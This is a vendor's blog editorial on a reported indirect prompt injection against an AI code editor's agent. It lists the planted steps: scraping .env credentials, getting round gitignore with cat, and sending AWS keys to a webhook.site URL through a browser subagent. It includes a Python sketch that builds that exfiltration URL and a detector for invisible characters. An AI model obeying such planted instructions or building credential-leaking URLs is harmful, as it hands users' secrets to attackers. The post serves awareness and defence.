Independent Editorial
⚠️ IMPORTANT DISCLAIMER
The views, opinions, analysis, and projections expressed in this article are those of the author and do not necessarily reflect the official position, policy, or views of Bad Character Scanner™, its affiliates, partners, or associated entities. This content is provided for informational and educational purposes only and should not be considered as professional advice, official company statements, or guarantees of future outcomes.
All data points, timelines, and projections are illustrative estimates based on publicly available information and industry trends. Readers should conduct their own research and consult with qualified professionals before making decisions based on this content.
Bad Character Scanner™ disclaims any liability for decisions made based on the information presented in this article.
We've Been Screaming About It. Now It's Happened
Google's shiny new Antigravity AI code editor got pwned. Hard.
PromptArmor just published a devastating indirect prompt injection attack that makes Antigravity steal your credentials, bypass its own security settings, and exfiltrate everything to an attacker-controlled domain.
Here's how it goes:
- User asks Antigravity to help integrate Oracle ERP's new AI Payer Agents feature
- Antigravity reads a poisoned "implementation guide" found online
- Hidden prompt injection (in 1pt font!) tells Gemini to:
  - Scrape credentials from .env files
  - Bypass its own gitignore protections using cat terminal commands
  - Build a malicious URL with your AWS keys URL-encoded as query parameters
  - Spawn a browser subagent to visit the attacker-monitored URL
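The exfiltration step above is trivially simple to implement, which is part of what makes it so dangerous. Here's a hedged sketch of roughly what building such a URL looks like; the endpoint path and parameter names are hypothetical placeholders, not taken from PromptArmor's writeup:

```python
from urllib.parse import urlencode

# Hypothetical stolen values -- illustrative placeholders, not real credentials.
stolen = {
    "aws_access_key_id": "AKIAEXAMPLEKEY",
    "aws_secret_access_key": "wJalrXUtnFEMI/EXAMPLE/KEY",
}

# URL-encode the credentials as query parameters on an attacker-controlled
# request-logging endpoint (webhook.site-style). Once a browser subagent
# visits this URL, the secrets land in the attacker's request logs.
exfil_url = (
    "https://webhook.site/00000000-0000-0000-0000-000000000000?"
    + urlencode(stolen)
)
print(exfil_url)
```

Note that urlencode handles the escaping automatically: slashes and plus signs in the secret key become %2F and %2B, so the payload survives the trip intact. No malware, no exploit chain, just a GET request.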
And the absolute kicker? The default URL allowlist includes webhook.site, literally a domain designed for logging arbitrary HTTP requests.
Game over. Your AWS credentials are now in an attacker's webhook logs.
Put it all together and you have a weaponized agentic AI with:
- Terminal command execution
- Browser automation tools
- Default configs that assume you'll "actively supervise" every agent action
Spoiler: You won't. That's literally why they built the Agent Manager interface to run multiple agents simultaneously in the background without constant human oversight.
Google addressed this with... a disclaimer.
A warning screen during onboarding that says "don't operate on sensitive data" and "review every action."
"Given that the Agent Manager allows multiple agents to run without active supervision, we find it extremely implausible that users will review every agent action." — PromptArmor Research Team
This part is an Ad:
You know what would actually help? The kind of defensive scanning we built.
Try Bad Character Scanner →
Scan your codebase. Find the invisible threats. Detect prompt injections. Stop the exfiltration before it happens.
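What does "find the invisible threats" look like in practice? Here's a minimal sketch of the core idea, flagging zero-width and direction-override characters that can hide injected instructions from a human reviewer. To be clear, this is an illustration of the technique, not Bad Character Scanner's actual implementation:

```python
import unicodedata

def find_invisible_chars(text: str):
    """Return (index, codepoint, name) for each Unicode format-category
    character (zero-width spaces, joiners, direction overrides, etc.)
    that renders invisibly but is still read by an LLM."""
    hits = []
    for i, ch in enumerate(text):
        # Category "Cf" (format) covers most characters used to hide
        # text: U+200B ZERO WIDTH SPACE, U+202E RIGHT-TO-LEFT OVERRIDE...
        if unicodedata.category(ch) == "Cf":
            hits.append((i, f"U+{ord(ch):04X}", unicodedata.name(ch, "UNKNOWN")))
    return hits

# A line that looks clean to a human but carries hidden characters.
doc = "Follow the guide\u200b and run cat .env"
for hit in find_invisible_chars(doc):
    print(hit)  # e.g. (16, 'U+200B', 'ZERO WIDTH SPACE')
```

The point: these characters are trivially detectable once you actually look for them. The poisoned "implementation guide" trick only works when nothing in your toolchain is looking.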

Editorial Standards Notice
This blog follows journalistic standards adapted for independent security research and commentary. Our content is based on publicly available sources and represents informed analysis rather than definitive fact-checking.
Corrections: If you believe any information in this article is inaccurate or requires correction, please submit your concern through our contact page with "Correction Request" in the subject line. Our editorial staff will review your submission and re-evaluate the facts as appropriate. We are committed to transparency and will update content when legitimate errors are identified.
Read more: Journalistic Standards | About the Blog